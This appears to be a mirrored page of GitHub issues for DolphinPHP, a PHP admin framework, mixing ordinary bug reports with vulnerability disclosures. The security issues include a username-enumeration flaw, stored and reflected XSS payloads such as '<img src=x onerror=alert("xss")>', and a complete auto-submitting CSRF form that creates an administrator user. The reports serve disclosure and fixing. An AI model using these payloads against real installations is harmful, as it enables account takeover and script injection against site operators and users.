Giter VIP home page Giter VIP logo

dolphinphp's Issues

bug提交-快速添加密码不能加密

/application/admin/controller/Admin.php
add 方法,password类型保存的时候没有加密,建议加上
foreach ($form['items'] as $item) {
if($item[0]=='password'){
$data[$item[1]]=Hash::make((string)$data[$item[1]]);
}
}

备份数据库失败

创建了视图,会被显示在列表里面。
但备份逻辑应该是只针对table的,若选中视图备份,会失败。

后台登录页面存在用户名枚举漏洞

1.登录admin账号,增加一个用户名为test的用户。
2.使用test账号加错误密码进行登录会出现“账号或者密码错误”
image
3.使用不存在的账号(这里使用test1),则会出现“用户不存在或被禁用”
image

你好,问个zbuild构建table时,在搜索关键字且当前页不为第1页时会搜索不到结果

你好,问个zbuild构建table时,在搜索关键字且当前页不为第1页时会搜索不到结果。

例:
使用zbuild构建当前table,翻页到第6页(大于第一页就行),然后,搜索任何一个关键字,会搜索不到,如果将url中的page=xxx改为page=1就可以搜索 到了。

这是一个小bug吧,当进行搜索时,要将当前的page重置为1才能有结果。这个怎样处理???

监听setTrigger 应该加一个清除控制

有的时候 切换显示隐藏并不需要清空隐藏的表单值,

/**
* 设置触发
* @param string $trigger 需要触发的表单项名,目前支持select(单选类型)、text、radio三种
* @param string $values 触发的值
* @param string $show 触发后要显示的表单项名,目前不支持普通联动、范围、拖动排序、静态文本
* @param bool $is_clear 是否清除隐藏表单的值,默认清除
* @author 蔡伟明
* @return $this
*/
public function setTrigger($trigger = '', $values = '', $show = '', $is_clear = true)

DolphinPHP v1.5.1 has a vulnerability, Stored Cross Site Scripting(XSS)

version:1.5.1
Vulnerability location:Background - > System - > system function - > configuration management.
image
image
Add a new configuration,and insert payload in the configuration title
payload: t">
image
Save and refresh the page. Pop up window.
image
payload: <img src=x onerror=alert("xss")>
image
image
When you visit this page, a pop-up window will pop up.

DolphinPHP v1.5.1 vulnerability, Reflected Cross Site Scripting(XSS)

version:1.5.1
Vulnerability location:Background - > System - > system function - > Attachment management.
Background - > System - > system function - > system log.
Background - > System - > system function - > Behavior management.
image
image
Influence parameters:search_field
payload:test"><img src=x onerror=alert("xss")>
image
image

Add User Function with CSRF vulnerability

The Add User form without csrf token.
Hacker can use it to add a new user.
Spoofing an administrator to open this page :

<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq&#64;aixinwei&#46;wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
<script>
    var f=document.getElementById("test");
    f.submit();
</script>
  </body>
</html>

suggestion for repairing:add csrf token to the html form.

DolphinPHP v1.5.1 has a vulnerability, Stored Cross Site Scripting(XSS)

version:1.5.1
Vulnerability location:Background - > System - > system function - > configuration management.
image
image
Add a new configuration,and insert payload in the configuration title
payload: t"><img src=x onerror=alert(1)>
image
Save and refresh the page. Pop up window.
image
payload: <img src=x onerror=alert("xss")>
image
image
When you visit this page, a pop-up window will pop up.

自动完成和zbuilder:table的callback冲突

public function setIpAttr(){
return request()->ip();
}
return ZBuilder::make('table')
->addColumns([
['ip','ip地址','callback',function($value){
// 这里的$value 是获取不到值的
return 456;
}],
->fetch();

图片上传bug

当设置缩略图时,并且上传图片过大(测试图片为894K和2.1M),会上传不成功,复现率100%

config 加载调整

行为这块 默认会在 app_begin 执行 config 会导致动态配置的config 无效.

*情景是这样的 如果我后台开启了水印,但是部分上传不需要水印 我可以动态关闭 upload_thumb_water 但是执行行为以后 每次到attachment 都会重新读取配置 导致 config('upload_thumb_water',0) 无效

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.